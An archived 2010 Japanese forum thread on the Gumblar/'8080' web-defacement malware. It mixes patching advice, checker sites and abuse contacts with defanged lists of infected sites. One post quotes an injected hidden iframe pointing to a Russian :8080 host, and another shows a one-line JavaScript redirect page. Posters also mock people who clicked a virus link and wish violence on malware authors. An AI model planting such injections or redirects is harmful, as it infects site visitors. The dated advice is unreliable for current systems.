感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ***
【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ9【8080】
http://pc11.2ch.net/test/read.cgi/sec/1274675964/
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic
※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります
●InternetExplorer ツール→インターネットオプション→セキュリティ→
レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
※ActiveXもOFF
●Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
●safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
●Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
●Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
もしくはLunascape5を使うといいようです。
●Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
ttp://www.gred.jp/
・aguse
ttp://www.aguse.net/
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html
■インシデント報告の届出(JPCERT/CC)
https://www.jpcert.or.jp/form/
サイト管理者の連絡先不明の場合はWHOISからサーバー管理者へ通報してください。
以下、代表的なサーバー管理会社
デジロック https://www.value-domain.com/webabuse.php
OCN http://www.ocn.ne.jp/info/rules/abuse/
さくら https://secure.sakura.ad.jp/notify/form/abuse.phtml
ロリポップ https://lolipop.jp/support/inq/
GMOインターネットグループ https://secure.gmo.jp/contact/
インフォシーク (isweb) http://portal.faq.rakuten.co.jp/
DION http://www.auone-net.jp/security/knowledge/navi/index.html
NTTPCコミュニケーションズ http://www.nttpc.ne.jp/
ODN https://www.odn.ne.jp/support/question/input_netabuse.html
xserver (株式会社ベット) http://www.xserver.ne.jp/faq.php
heteml ヘテムル https://secure.heteml.jp/support/inquiry/
ファーストサーバ http://www.firstserver.co.jp/contact/index.html
エキサイト http://www.excite.co.jp/help/support
ウイルス・不正アクセス届出状況について(3月分および第1四半期)
http://www.ipa.go.jp/security/txt/2010/04outline.html
(3)ウェブサイト改ざんの被害発生時の対処
ウェブサイトが改ざんされてしまった場合、ウェブサイト管理者は被害者であると同時に、ウェブサイト利用者に対する加害者となってしまう可能性があります。
被害の拡大を防ぐために、次に示すような対応が求められます。
▼まず初めに行うべきこと
まず初めに行うことは、早急にウェブサイトの公開を停止することです。同時に ftp のパスワードの変更も行ってください。
このとき、これまでウェブサイトの管理に利用していたパソコンには、ftp のパスワードを盗聴するウイルスが感染している可能性があるため、別のパソコンから操作することを勧めます。
同時に、別のウェブサイトを立てるなどして、ウェブサイト利用者に対して調査状況の説明や、問い合わせ用窓口を設けるなど、随時情報提供に努めてください。
▼改ざん箇所の洗い出し等の調査
上記の対応を行ったのち、保管しておいたクリーンなファイルとウェブサーバ上のファイルの比較などの方法で、全ての改ざん箇所の洗い出しを行ってください。
また、同じパソコンで管理しているウェブサイトが複数ある場合、他のウェブサイトにも改ざんが及んでいる可能性があるため、必ず全てのウェブサイトのファイルを確認してください。
また、改ざん期間等を把握するため、改ざん箇所ごとに ftp のアクセスログの確認などを行なって、被害状況等の調査を行ってください。
▼ウェブサイトを再公開する場合
上記の対応で全ての改ざん箇所の修正を行った上で、ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
改ざんの事実の説明
・ 改ざんされていた箇所
・ 改ざんされていた期間
・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害(ウイルス感染など)の説明
・ ウイルスのチェック方法の説明(必要に応じてオンラインスキャンサイトの紹介など)
・ 問い合わせ用窓口の連絡先
IPAに不正アクセスの届出
http://www.ipa.go.jp/security/ciadr/index.html
設定例:JaneView
設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
http://www.geocities.jp/nanasi_san_exe/online_help/option/function/command.html
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK
テンプレ乙
http://pc11.2ch.net/test/read.cgi/sec/1278430098/
なんでこっちじゃいかんの?
取扱注意
www●kakiyasuhonten●co●jp
999 名前:名無しさん@お腹いっぱい。:2010/07/21(水) 13:52:18
store●nextbusinesssystem●com
www●kidsdrink●jp
スレチ承知スマソだけど8080使いそうで怖すぎる
今のところは標的型だから実物は発電所勤務とかでもなきゃ手に入らないんじゃね。
なし。まぁ感染するウイルスは定期的に差しかえられるので、
毎日が0デイ状態のようなもの・・・
ttp://www.virustotal.com/isis/42c9f334b7de4a63ed92be606a650d59771fb354fa49f4399d098c24529c925d-1279803865
検体欲しぃの
コーエーテクモもGumblar感染?
botnetの顧客への販売(インチキセキュソフトの販売等)だろうから。
まだZeuSとかのがありえる。
あぅあぅ〜
pantscow●ru:8080/CD-ROM●js
凸っておきました
SQLインジェクション系攻撃にやられたんじゃねーの?
うちのサイトは、アプリ更新あるごとに外部のセキュリティー企業で診断+Webファイアウォール導入だな
http://support.kaspersky.co.jp/viruses/solutions?qid=208283462
を使用したところ
Spliced functions という値が32(ほかの値は0)という結果が表示されました
何度かツールを実行したのですが Spliced functions の値がずっと 1 のままです。
これは既に感染していると考えてよろしいのでしょうか?
そもそもzlkon.lv→gumblar.cn→martuz.netだったわけだし。
これらは日本を除外している( >>31 )。
ru多めなのは8080。
まだ読んでないけど、実際はUSが多いのかthx
>>32
8080型に多いのは知ってるんだけどさ
TLDがruに偏ってたのはなんでだろうなーと思って
特に理由はないのかね
www●crimsontech●jp/jp/home●html
> 弊社ホームページに関するお詫びとお知らせ
対応してくれた模様、感染の公表とIPAへの報告に感謝
もうちょっと早かったら言うことなかったなあ
で、本スレどっち…
http://pandajapanblogs.blogspot.com/2010/07/fbi.html
感染PC全部駆除の刑。
ポケモンの公式ページ、
新しいポケットモンスターのこと知ってますかのページの
左上任天堂ロゴのリンク先おかしいぞ
社員見てるならさっさと直せ
497 名前:名無しさん必死だな[sage] 投稿日:2010/07/30(金) 21:18:47 0
クリックしたらパス求められるな
任天堂HPにもGumblarか?
本当にばいいのに
鍵開けてたら泥棒に入られましたみたいな
放火魔が出ているのに燃えやすいものを置きっぱなしにして
火事になり、近隣まで延焼で大迷惑。
PC初心者でもすぐにできる対処法だけで完璧に防げるならその物言いも罷り通るんだけどな
現実は日々ゼロデイ
日本には「○○入れてるから大丈夫」という
セキュリティソフト依存症患者(精神疾患)が多いからなw
壁や屋根に穴が空いてたり、鍵や窓が壊れていても
「セコム入ってるから大丈夫(キリッ」
(´・ω・`)
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2307
いまだにXP使ってたりFirefox使ってるアホが多いからこんなに感染者が増えるんだよ
Firefoxが高セキュリティーとかガセネタ流してるアホは全員死刑にすべき
どっちが安全?
このソフトなら安全と過信している時点でその類だよ。
そもそも100%感染防止なんてできないのに
感染防止策だけで満足しているにわかは多い。
RequestPolicyがあれば他ドメインへの通信はしないから外部接続系には安全
アクセス自体しないんだから当たり前
Chromeはアクセスしちゃうけどなんで大丈夫なの?
ttp://blog.fourteenforty.jp/blog/2010/04/windows-xpgoogl.html
スレ汚し失礼
www●1on1●jp
www●untiens●jp
ログにはru8080へ接続した形跡があるけど、aguseだと検出しないという…
ruドメインのjsファイルが呼び出された後に8080サイトへ行ってるみたいだが…
■現行型
チャイナ・テーブル 八菜香
398133●com/
当選者発表|柿安創業138周年感謝祭
www●kakiyasuhonten●co●jp/m138th
禿に捕捉(キャッシュ)されてまつw
■トラップ(はぢめて見た)
【楽々茶 LALACHA】:中国茶・茶器・雑貨専門店
www●lalacha●com/
↓
<iframe src=”hxxp://parkperson●ru:8080/index●php?pid=13” width=”0” height=”0” style=”display:none”></iframe>
■旧型(絶賛放置中)
hnfko●web●fc2●com/yama/20080428_shishigatake/index●html
adajo●namidaame●com/
他は知らんw
--
この度は当社サイトについてご連絡頂き誠にありがとうございました。
〜〜中略〜〜
ご連絡を受けまして確認の上速やかに削除いたしました。
重ねてお礼申し上げます。
--
との事。
http://itpro.nikkeibp.co.jp/article/COLUMN/20100801/350884/
これは新しい…
/*SOS*/
飛び先はNortonセーフウェブで黒判定。
× 飛び先が真っ黒なのを確認
○ 飛び先のサイトが真っ黒なのを確認
youhelpnow●ru:8080
やられるやつって相当アホだろ
全cssの末尾に何か付いてる
どもです。
cssにも付くようになったのね。。。
末尾「.txt」にして送付、ひげおじさんからお返事。
> 〜.css.txt - Trojan-Downloader.JS.Agent.fnh
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
これマジ?
http://www.fuzita.org/spams/spamdiary.html
<html><head><script>location = 'http://xxxxxx/';</script></head></html>
↑こんな一行htmlをUPしてスパムの中継にも使われてる
\(^o^)/オワタ
\(^o^)/直リンクw
Exploit.HTML.HCP.a
オンラインゲームのパス抜きのもの
ilion.blog47.fc2.com/blog-entry-201.html
www.virustotal.com/jp/isis/cdff7e34478a48929083674034e97fb773dcf40ccef8e70b6f6a2e56fa34c870-1281401616
>>66
ノーガードとかアホとか関係なくって、ソフトウェアの
脆弱性をふさいでるかどうか
この短時間でアプリの穴を修正できるわけがない、と思ったら停止しただけでござる。
2010.08.10 2011年度向け商品開発中のため現在、
商品ページがご覧になれなくなっています。
ご迷惑をおかけしますが何卒ご了承ください。
www●bmisland●net/input/mailmag/detail●asp?MAGID=31&MAGCLS=274&SDFLG=1
www●dousoukainet●jp/plan●asp
本気で作者を頃してやりたいわ
つーか本気でよ銃殺されろ
作者の国に核落とされて滅んじまえ
セキュリティソフトは関係ないよ。
現時点での話に限れば、それはIEブラウザ、かつWindows Updateを
しとらん場合に攻撃が成立しうる。
逆に8080やgumblar.xはブラウザの種類は関係ない。
アクセスしてきたブラウザに応じた攻撃コードが生成されるように
なっとる。
*/yahoo.js*
全部蹴ればええやんw
ニュースで窃盗事件が流れるたびにそこまで考えてたら疲れないか?
とっくに地球滅びてるよな
けいおんのモデルの子も同窓会ネットで顔バレしてるぞ
http://www.dousoukainet.jp/plan.asp
だから言わんこっちゃない┐(VДV)┌
336 :風の谷の名無しさん@実況は実況板で:2010/08/13(金) 02:37:24 ID:LsxSDH1C0
>>311
これ前にも見たけど
けいおんのモデルになったJKって美人ではあるけどアニメには劣るよな
所詮3次元('A`)
387 :風の谷の名無しさん@実況は実況板で:2010/08/13(金) 02:55:26 ID:z25JrXmm0
>>311
そのページのどこにも写真ないんだけど
411 :(VдV) ◆yUyb3Tqn92 :2010/08/13(金) 03:09:49 ID:PPZzZ1Px0
(VДV)部アッハッハッハはヒャ日波や八はアッハハハyはyヒャヒャヒャhyはyはy早はh!
俺様が貼ったのは最新のウィルスだよ
(<●>Д<●>)踏んだ奴ざまぁあああああああああああああああああああああああああっ!
駆除方法はメール欄参照な:(>w<):
416 :(VдV) ◆yUyb3Tqn92 :2010/08/13(金) 03:17:09 ID:PPZzZ1Px0
さてウィルス(>>311)も踏ませたことだし
もう寝るお
(VдV)踏んだ奴は徹夜してリカバリするかLANケーブル外しとくことだな
どちらにせよお前らがウィルス対策の作業している間、俺様はグッスリzZZだお♪
http://www.itmedia.co.jp/enterprise/articles/1008/12/news061.html
とうとうWinだけの問題じゃなくなってきたな
だからそういう奴がいるから
結局●とか入れても意味ねーんだよ
なので次からURL貼るときは●抜きを許可する
これはどういうウイルスですか?
これ踏んじゃったんだけどJavaScript切っていれば大丈夫?
これって禿.jsって奴?
Firefox+NoScriptなら踏んでもOK?
おk
ネトゲのトロイ。
ネトゲやってないからよく分からないけど
右上のにID、PASSを入力したらネトゲアカウント取られるってやつ?
そんな奴らは絶対IEなんか使っちゃ駄目だろ
別にFirefox厨じゃないけどFirefox+NoScriptでブラウジングしておきゃ感染しないんだから
初心者にはこの組み合わせを薦めるべき
入れるだけでおkなんだから
>>2よりも>>4こっちが最優先
TOP カテ一覧 スレ一覧 2ch元 削除依頼 ▲
【SONY BMG】 レーベルゲートCD に rootkit 仕込む (803)
ID表示ってやばくない? (492)
ウィルスバスター(笑) (436)
踏んでしまったブラクラを貼るスレ (262)
【ノートン】Norton Internet Security Ver.218【2012】 (831)
SpyDefense 0.9.5.116 Beta (390)
--log9.info------------------
武藤ってなんでヤオ禿って呼ばれているの? (750)
T-1 二見専用 (538)
ケロちゃんの前口上 (202)
アンドレ・シン・ホーガン・ハンセン・ブロディ・ベイダー・ブッチャ- (859)
芸能界・有名人をプロレス風に語ろうZE!Part3 (328)
【純粋に】栗原あゆみ【応援】 (273)
【WWE・SMACKDOWN】ヨシ・タツ Part18【山本尚史】 (867)
【極悪】ブッチャー・シン・シーク・馬之助【四天王】PART2 (467)
【空中殺法】 紫雷イオ 【華麗】 (891)
★★★ エクトール・ガルサが最高! ★★★ (496)
レスラー2人に傷害容疑で逮捕状 同僚が意識不明 (904)
1980年の新日本プロレス Part2 (939)
<貴>プロレスリング FREEDOMS 2<葛西> (684)
【キド】最も危険なプロレス技は?3プラトン【クラッチ】 (446)
【客には怪我】全日・不祥事総合【選手にはリンチ】 (429)
【グワッハッハッ】天龍源一郎12【源一郎スマイル】 (705)
--log55.com------------------
旧国鉄が分割民営化した当時の経営計画が機能しなくなっている 国と政府はなんとかしろ
「なぜアジア人の写真がマクドナルドのポスターに無いの?」ポスターを自作し店舗に貼った男性ら称賛
【テニス】大坂なおみの祖父は根室漁協のドン 大豪邸に住んでてワロタ
モスバーガーで食中毒
京都最強だった
【自民党】石破茂氏、維新の足立議員に「総裁選は石破茂に!」と、電話してしまう。
国交省「伊丹空港で国際線を受け入れてくれ」 伊丹市「話し合うから待って」
大坂なおみ一番日本語でときめいたセリフ 「ヤリタクネェコト、ヤッテルヒマハネ〜♪」
